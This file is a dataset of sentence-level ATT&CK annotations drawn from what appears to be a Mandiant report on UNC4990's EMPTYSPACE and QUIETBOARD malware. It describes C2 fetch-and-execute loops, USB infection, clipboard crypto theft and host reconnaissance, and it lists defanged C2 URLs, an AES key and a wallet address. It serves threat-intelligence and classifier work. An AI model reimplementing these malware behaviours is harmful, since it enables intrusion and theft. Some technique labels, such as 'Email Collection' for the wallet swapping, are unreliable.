"doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "The code continuously attempts to reach a specific URL ( hxxp://google[.]com/generate_204 ) with a 30-second timeout.", "sentence_text": "If unsuccessful, it retries after 2 seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s87-5d71cb", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "If unsuccessful, it retries after 2 seconds.", "sentence_text": "This check likely verifies internet connectivity before proceeding.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s88-bbd239", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "This check likely verifies internet connectivity before proceeding.", "sentence_text": "Next, it creates a variable request_data containing encoded information:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s89-35db0e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Next, it creates a variable request_data containing encoded information:", "sentence_text": "Encodes a JSON dictionary with user details, including username and path of the executable file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s90-eab8af", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "Encodes a JSON dictionary with user details, including username and path of the executable file.", "sentence_text": "Adds \"AA\" and \"==\" at the beginning and end of the encoded data, exactly the same way the .NET version of EMPTYSPACE is formatting the data before sending it to the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Format encoded data by adding markers before sending it to the C2 server.", "entities": [ { "text": "Adds \"AA\" and \"==\" at the beginning and end of the encoded data", "start": 0, "end": 63, "label": "Action" }, { "text": "C2 server", "start": 165, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s91-ab2ece", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "Adds \"AA\" and \"==\" at the beginning and end of the encoded data, exactly the same way the .NET version of EMPTYSPACE is formatting the data before sending it to the C2 server.", "sentence_text": "Once data is prepared, the code iterates over a list of URLs, attempting to send POST requests containing the request_data Upon successful communication, it attempts to decode the server's response using Base64 and then deserialize it using the marshal.loads function.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Send POST requests to multiple URLs and process the server response by decoding and deserializing it.", "entities": [ { "text": "iterates over a list of URLs, attempting to send POST requests containing the request_data", "start": 32, "end": 122, "label": "Action" }, { "text": "attempts to decode the server's response using Base64 and then deserialize it using the marshal.loads function", "start": 157, "end": 267, "label": "Action" }, { "text": "URLs", "start": 56, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s92-8f95f6", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "Once data is prepared, the code iterates over a list of URLs, attempting to send POST requests containing the request_data Upon successful communication, it attempts to decode the server's response using Base64 and then deserialize it using the marshal.loads function.", "sentence_text": "It executes the deserialized data using the exec function.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Execute deserialized data using the Python exec function.", "entities": [ { "text": "executes the deserialized data using the exec function", "start": 3, "end": 57, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s93-b66446", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "It executes the deserialized data using the exec function.", "sentence_text": "QUIETBOARD (Program.pyz)\nQUIETBOARD is a Python based pre-compiled multi-component backdoor capable of arbitrary command execution, clipboard content manipulation for crypto currency theft, USB/removable drive infection, screenshotting, system information gathering, and communication with the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s94-18af82", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "QUIETBOARD (Program.pyz)\nQUIETBOARD is a Python based pre-compiled multi-component backdoor capable of arbitrary command execution, clipboard content manipulation for crypto currency theft, USB/removable drive infection, screenshotting, system information gathering, and communication with the C2 server.", "sentence_text": "Additionally, the backdoor has the capability of modular expansion and running independent Python based code/modules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s95-0b36f4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "Additionally, the backdoor has the capability of modular expansion and running independent Python based code/modules.", "sentence_text": "Following is a breakdown of what each component entails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s96-ddbbef", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Following is a breakdown of what each component entails.", "sentence_text": "start\nThe\nstart\nmodule in the malware framework serves as an orchestrator or initializer for the other components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s97-c68f36", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "start\nThe\nstart\nmodule in the malware framework serves as an orchestrator or initializer for the other components.", "sentence_text": "During its execution, the module:\nChecks for the existence of a lock file ( program.lock ) in the current directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s98-2e08ed", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "During its execution, the module:\nChecks for the existence of a lock file ( program.lock ) in the current directory.", "sentence_text": "If this lock file exists, it's deleted.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Delete existing lock file to control execution flow.", "entities": [ { "text": "it's deleted", "start": 26, "end": 38, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s99-61713d", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "If this lock file exists, it's deleted.", "sentence_text": "Checks if a file named overload exists in the current directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s100-6f766c", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Checks if a file named overload exists in the current directory.", "sentence_text": "Checks if a directory named runs exists; if not, it creates one.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Create directory if it does not exist to support execution workflow.", "entities": [ { "text": "creates one", "start": 52, "end": 63, "label": "Action" }, { "text": "runs", "start": 28, "end": 32, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s101-2b05b5", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Checks if a directory named runs exists; if not, it creates one.", "sentence_text": "If it exists, the script iterates through all files contained in this directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s102-4570fd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "If it exists, the script iterates through all files contained in this directory.", "sentence_text": "Each file is treated as a script: it's read, decoded, unmarshalled, and executed similarly to the overload file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Read, decode, unmarshal, and execute script files.", "entities": [ { "text": "read, decoded, unmarshalled, and executed", "start": 39, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s103-439d06", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Each file is treated as a script: it's read, decoded, unmarshalled, and executed similarly to the overload file.", "sentence_text": "This directory could be used for executing multiple scripts, possibly allowing for modular expansion of the malware’s capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s104-642f09", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "This directory could be used for executing multiple scripts, possibly allowing for modular expansion of the malware’s capabilities.", "sentence_text": "coronausb\nThis component monitors and infects removable drives.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" } ], "procedure": "Monitor and infect removable drives to propagate malware.", "entities": [ { "text": "monitors and infects removable drives", "start": 25, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s105-270233", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "coronausb\nThis component monitors and infects removable drives.", "sentence_text": "The name of the shortcut can be either of two patterns depending on whether a volume label is present or not:\n (GB).lnk\n (GB).lnk\nThis shortcut is linked to a PowerShell script that is written inside the USB drive and is named explorer.ps1 The hidden folder is created as follows:\nThis\nempty_character\nmechanism results in the generation of the Hangul Filler character ( E3 85 A4 ) which visually shows up as a whitespace making the directory path appear as \" D:\\ \" (assuming D to be the removable drive).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s106-b56352", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "The name of the shortcut can be either of two patterns depending on whether a volume label is present or not:\n (GB).lnk\n (GB).lnk\nThis shortcut is linked to a PowerShell script that is written inside the USB drive and is named explorer.ps1 The hidden folder is created as follows:\nThis\nempty_character\nmechanism results in the generation of the Hangul Filler character ( E3 85 A4 ) which visually shows up as a whitespace making the directory path appear as \" D:\\ \" (assuming D to be the removable drive).", "sentence_text": "There is also a mechanism which checks if an older version of explorer.ps1 already exists on any of detected USB drives and removes it, replacing it with a new version.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Check for existing script on USB drives, remove it, and replace it with a new version.", "entities": [ { "text": "checks if an older version of explorer.ps1 already exists on any of detected USB drives and removes it, replacing it with a new version", "start": 32, "end": 167, "label": "Action" }, { "text": "explorer.ps1", "start": 62, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s107-9ef5c4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "There is also a mechanism which checks if an older version of explorer.ps1 already exists on any of detected USB drives and removes it, replacing it with a new version.", "sentence_text": "This ensures the “update” of older infected removable drives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s108-c73b8d", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "This ensures the “update” of older infected removable drives.", "sentence_text": "cboard\nThis component acts as a crypto stealer by continuously monitoring and altering the clipboard content.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s109-43b32e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "cboard\nThis component acts as a crypto stealer by continuously monitoring and altering the clipboard content.", "sentence_text": "It tries to detect known patterns for crypto wallet addresses and replace them with its own wallet addresses with the intention of stealing crypto from any transaction the victim might conduct.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" } ], "procedure": "Detect crypto wallet address patterns and replace them with attacker-controlled wallet addresses.", "entities": [ { "text": "tries to detect known patterns for crypto wallet addresses and replace them with its own wallet addresses", "start": 3, "end": 108, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s110-fea83a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "It tries to detect known patterns for crypto wallet addresses and replace them with its own wallet addresses with the intention of stealing crypto from any transaction the victim might conduct.", "sentence_text": "The following table lists a general breakdown of the patterns matched, and the replaced wallet addresses:\nAdditionally, Mandiant has observed the Bitcoin address bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w being injected in the HTML code of multiple Italian websites, mainly connected to Italian universities, substantiating the financial motives behind the threat actors’ actions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Inject a cryptocurrency wallet address into website HTML code.", "entities": [ { "text": "bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w", "start": 162, "end": 204, "label": "Infrastructure_Indicator" }, { "text": "being injected in the HTML code of multiple Italian websites", "start": 205, "end": 265, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s111-d9db1e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "The following table lists a general breakdown of the patterns matched, and the replaced wallet addresses:\nAdditionally, Mandiant has observed the Bitcoin address bc1qk55vk7wjgzg3pmxlh59rv5dlgewd9jem5nrt4w being injected in the HTML code of multiple Italian websites, mainly connected to Italian universities, substantiating the financial motives behind the threat actors’ actions.", "sentence_text": "The Bitcoin address was first used towards the end of 2022, on December 11.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s112-974eb2", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "The Bitcoin address was first used towards the end of 2022, on December 11.", "sentence_text": "runservice\nThis component is primarily meant to dynamically fetch and execute additional Python code from the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Fetch and execute additional code from a command and control server.", "entities": [ { "text": "fetch and execute additional Python code from the C2 server", "start": 60, "end": 119, "label": "Action" }, { "text": "C2 server", "start": 110, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s113-0ded42", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "runservice\nThis component is primarily meant to dynamically fetch and execute additional Python code from the C2 server.", "sentence_text": "The malware generates the following JSON based on information gathered by the info module:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s114-44c46b", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "The malware generates the following JSON based on information gathered by the info module:", "sentence_text": "The JSON is Base64 encoded and AES encrypted with the following key in CBC mode:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s115-bd806e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "The JSON is Base64 encoded and AES encrypted with the following key in CBC mode:", "sentence_text": "Key:\n4lZYQ/POapYTZka0gVM/rg==\nThe malware then proceeds to send the encrypted JSON in a POST request to the following C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s116-0f1e90", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Key:\n4lZYQ/POapYTZka0gVM/rg==\nThe malware then proceeds to send the encrypted JSON in a POST request to the following C2 server.", "sentence_text": "hxxps://luke.compeyson.eu[.]org/runservice/api/public.php The malware expects to receive Python code in response, which it executes and communicates back the result of to the following URL in a post request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Receive Python code from a C2 server, execute it, and send the execution results back via HTTP POST.", "entities": [ { "text": "hxxps://luke.compeyson.eu[.]org/runservice/api/public.php", "start": 0, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "expects to receive Python code in response, which it executes and communicates back the result of to the following URL in a post request", "start": 70, "end": 206, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s117-1a5cb7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "hxxps://luke.compeyson.eu[.]org/runservice/api/public.php\nThe malware expects to receive Python code in response, which it executes and communicates back the result of to the following URL in a post request.", "sentence_text": "hxxps://luke.compeyson.eu[.]org/runservice/api/public_result.php This fetch and execute operation continues indefinitely until the server responds with data containing a \"continue\" flag set to False.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Continuously fetch and execute code from a C2 server until instructed to stop.", "entities": [ { "text": "hxxps://luke.compeyson.eu[.]org/runservice/api/public_result.php", "start": 0, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "fetch and execute operation continues indefinitely until the server responds with data containing a \"continue\" flag set to False", "start": 70, "end": 198, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s118-f8462a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "hxxps://luke.compeyson.eu[.]org/runservice/api/public_result.php\nThis fetch and execute operation continues indefinitely until the server responds with data containing a \"continue\" flag set to False.", "sentence_text": "executer\nThis component contains the functionality to dynamically execute Python code and is used by the runservice module to execute the received Python payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s119-eafdfa", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "executer\nThis component contains the functionality to dynamically execute Python code and is used by the runservice module to execute the received Python payloads.", "sentence_text": "info\nThe\ninfo\ncomponent of the malware is designed to gather and assemble various pieces of information about the infected computer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s120-38610f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "info\nThe\ninfo\ncomponent of the malware is designed to gather and assemble various pieces of information about the infected computer.", "sentence_text": "It then structures this information into a JSON object, which is later used in the runservice component, and is also communicated back to the C2 server by the connection component.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Structure collected information into JSON and send it to the C2 server.", "entities": [ { "text": "structures this information into a JSON object", "start": 8, "end": 54, "label": "Action" }, { "text": "communicated back to the C2 server", "start": 117, "end": 151, "label": "Action" }, { "text": "C2 server", "start": 142, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s121-ab33ce", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "It then structures this information into a JSON object, which is later used in the runservice component, and is also communicated back to the C2 server by the connection component.", "sentence_text": "The module compiles the following host information:\nGenerates a unique id for the system and stores it in a file named \" cUuid.dat \" (if one already does not exist).", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Generate a unique system identifier and store it locally in a file.", "entities": [ { "text": "Generates a unique id for the system and stores it in a file named \" cUuid.dat \"", "start": 52, "end": 132, "label": "Action" }, { "text": "cUuid.dat", "start": 121, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s122-ad710c", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "The module compiles the following host information:\nGenerates a unique id for the system and stores it in a file named \" cUuid.dat \" (if one already does not exist).", "sentence_text": "Attempts to read the installation date from a file named \" instDate.dat \", and creates and writes to it if one is not already available.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read installation date from a local file and create and write it if it does not exist.", "entities": [ { "text": "Attempts to read the installation date from a file named \" instDate.dat \", and creates and writes to it if one is not already available", "start": 0, "end": 135, "label": "Action" }, { "text": "instDate.dat", "start": 59, "end": 71, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s123-0af2cd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "Attempts to read the installation date from a file named \" instDate.dat \", and creates and writes to it if one is not already available.", "sentence_text": "Retrieves system specifications by executing the following WMI queries:\nSelect * from Win32_OperatingSystem Select * from Win32_ComputerSystem", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "Retrieve system information by executing WMI queries.", "entities": [ { "text": "Retrieves system specifications by executing the following WMI queries", "start": 0, "end": 70, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s124-2d52d2", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "Retrieves system specifications by executing the following WMI queries:\nSelect * from Win32_OperatingSystem Select * from Win32_ComputerSystem", "sentence_text": "Select * from Win32_Processor Select * from Win32_VideoController Retrieves WIFI SSIDs by running the command \" netsh wlan show interfaces \" Retrieves BSSID information by running the command \" netsh wlan show networks mode=bssid \" Attempts to geo locate the infected computer by querying the URL:\nhxxps://www.googleapis[.]com/geolocation/v1/geolocate?key=AIzaSyBOti4m-6x9WDnZIjIeyEU21OpBXqWBgw\nAttempts to read a UUID from a file named \" from_machine_uuid.dat \" which from context might contain the UUID of the source infection machine.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" }, { "id": "T1016", "name": "System Network Configuration Discovery" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Collect system, network, geolocation, and identifier information using WMI queries, system commands, external service queries, and local file access.", "entities": [ { "text": "Select * from Win32_Processor Select * from Win32_VideoController", "start": 0, "end": 65, "label": "Action" }, { "text": "Retrieves WIFI SSIDs by running the command \" netsh wlan show interfaces \"", "start": 66, "end": 140, "label": "Action" }, { "text": "Retrieves BSSID information by running the command \" netsh wlan show networks mode=bssid \"", "start": 141, "end": 231, "label": "Action" }, { "text": "Attempts to geo locate the infected computer by querying the URL", "start": 232, "end": 296, "label": "Action" }, { "text": "Attempts to read a UUID from a file named \" from_machine_uuid.dat \"", "start": 395, "end": 462, "label": "Action" }, { "text": "hxxps://www.googleapis[.]com/geolocation/v1/geolocate?key=AIzaSyBOti4m-6x9WDnZIjIeyEU21OpBXqWBgw", "start": 298, "end": 394, "label": "Infrastructure_Indicator" }, { "text": "from_machine_uuid.dat", "start": 439, "end": 460, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s125-559fbe", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "Select * from Win32_Processor Select * from Win32_VideoController Retrieves WIFI SSIDs by running the command \" netsh wlan show interfaces \" Retrieves BSSID information by running the command \" netsh wlan show networks mode=bssid \" Attempts to geo locate the infected computer by querying the URL: hxxps://www.googleapis[.]com/geolocation/v1/geolocate?key=AIzaSyBOti4m-6x9WDnZIjIeyEU21OpBXqWBgw Attempts to read a UUID from a file named \" from_machine_uuid.dat \" which from context might contain the UUID of the source infection machine.", "sentence_text": "connection The connection component communicates back all the gathered information from the victim system (generated by the info module) to the C2 server, optionally including a screenshot of the system.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Send collected victim system information to the C2 server.", "entities": [ { "text": "communicates back all the gathered information from the victim system (generated by the info module) to the C2 server", "start": 36, "end": 153, "label": "Action" }, { "text": "C2 server", "start": 144, "end": 153, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s126-3492b0", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "connection\nThe\nconnection\ncomponent communicates back all the gathered information from the victim system (generated by the info module) to the C2 server, optionally including a screenshot of the system.", "sentence_text": "It can further keep operating in a loop with a sleep time specified by the C2 server, and which is by default set to 0.1s.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s127-61a50b", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "It can further keep operating in a loop with a sleep time specified by the C2 server, and which is by default set to 0.1s.", "sentence_text": "Moreover, the connection module execute arbitrary Python code received from the C2 server in the same loop using the executer module, similar to runservice .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute arbitrary code received from the command and control server.", "entities": [ { "text": "execute arbitrary Python code received from the C2 server", "start": 32, "end": 89, "label": "Action" }, { "text": "C2 server", "start": 80, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s128-9b4ff0", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "Moreover, the connection module can execute arbitrary Python code received from the C2 server in the same loop using the executer module, similar to runservice .", "sentence_text": "However, this module has the added functionality of either executing the received code synchronously or asynchronously, in a newly generated thread, based on the setting received from the configured C2 server:\nhxxps://eu1.microtunnel[.]it/c0s1ta/index.php\ncoronausb\nmodule, while another had all the modules previously described except for runservice.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s129-f45e3a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "However, this module has the added functionality of either executing the received code synchronously or asynchronously, in a newly generated thread, based on the setting received from the configured C2 server:\nhxxps://eu1.microtunnel[.]it/c0s1ta/index.php\ncoronausb\nmodule, while another had all the modules previously described except for runservice.", "sentence_text": "This might suggest the order in which the threat actor has developed each module, starting with the capability of infecting USB drives and adding more functionality on top of it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s130-87c6ae", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "This might suggest the order in which the threat actor has developed each module, starting with the capability of infecting USB drives and adding more functionality on top of it.", "sentence_text": "Having the runservice module as a last addition is telling of how the threat actor evolved, gained confidence and updated the code with a C2 capability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s131-d286dc", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "Having the runservice module as a last addition is telling of how the threat actor evolved, gained confidence and updated the code with a C2 capability.", "sentence_text": "In one particular infection, after months of just beaconing activity, QUIETBOARD dropped an open-source coinminer, further supporting the financial gain angle for the threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Drop an open-source coinminer on the infected system.", "entities": [ { "text": "QUIETBOARD", "start": 70, "end": 80, "label": "MalwareTool" }, { "text": "dropped an open-source coinminer", "start": 81, "end": 113, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s132-a78cc4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "In one particular infection, after months of just beaconing activity, QUIETBOARD dropped an open-source coinminer, further supporting the financial gain angle for the threat actor.", "sentence_text": "Threat Actor Spotlight: UNC4990", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s133-1bc4e7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Threat Actor Spotlight: UNC4990", "sentence_text": "Though the group’s TTPs have evolved over time, UNC4990 operations generally involve widespread USB infection followed by the deployment of the EMPTYSPACE downloader.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Infect systems via USB drives and deploy the EMPTYSPACE downloader.", "entities": [ { "text": "UNC4990", "start": 48, "end": 55, "label": "ThreatActor" }, { "text": "widespread USB infection followed by the deployment of the EMPTYSPACE downloader", "start": 85, "end": 165, "label": "Action" }, { "text": "EMPTYSPACE", "start": 144, "end": 154, "label": "MalwareTool" } ] }, { "uid": 